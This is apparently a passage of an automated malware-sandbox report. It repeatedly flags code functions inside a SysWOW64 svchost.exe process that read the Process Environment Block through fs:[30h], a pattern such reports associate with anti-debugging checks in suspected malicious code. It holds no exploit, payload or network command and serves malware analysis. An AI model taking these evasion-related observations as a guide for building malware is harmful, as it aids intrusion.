            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h] | 2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h] | 2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] | 2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h] | 2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] | 2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h] | 2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] | 2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] | 2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] | 2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h] | 2_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h] | 2_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h] | 2_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h] | 2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h] | 2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h] | 2_2_03AD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h] | 2_2_03B0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h] | 2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h] | 2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] | 2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] | 2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h] | 2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] | 2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] | 2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h] | 2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h] | 2_2_03B062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h] | 2_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] | 2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] | 2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h] | 2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h] | 2_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h] | 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h] | 2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h] | 2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h] | 2_2_03B0625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h] | 2_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h] | 2_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h] | 2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h] | 2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h] | 2_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h] | 2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h] | 2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h] | 2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h] | 2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] | 2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] | 2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] | 2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h] | 2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] | 2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] | 2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h] | 2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h] | 2_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h] | 2_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h] | 2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h] | 2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h] | 2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h] | 2_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h] | 2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h] | 2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] | 2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] | 2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h] | 2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h] | 2_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h] | 2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h] | 2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] | 2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] | 2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h] | 2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] | 2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h] | 2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h] | 2_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h] | 2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h] | 2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h] | 2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A280A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h] | 2_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h] | 2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h] | 2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h] | 2_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h] | 2_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h] | 2_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h] | 2_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h] | 2_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h] | 2_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h] | 2_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h] | 2_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h] | 2_2_03AC6030
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h] | 2_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h] | 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h] | 2_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h] | 2_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h] | 2_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h] | 2_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h] | 2_2_03AE47A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h] | 2_2_03AD678E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h] | 2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h] | 2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h] | 2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h] | 2_2_03ABE7E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h] | 2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h] | 2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h] | 2_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h] | 2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h] | 2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
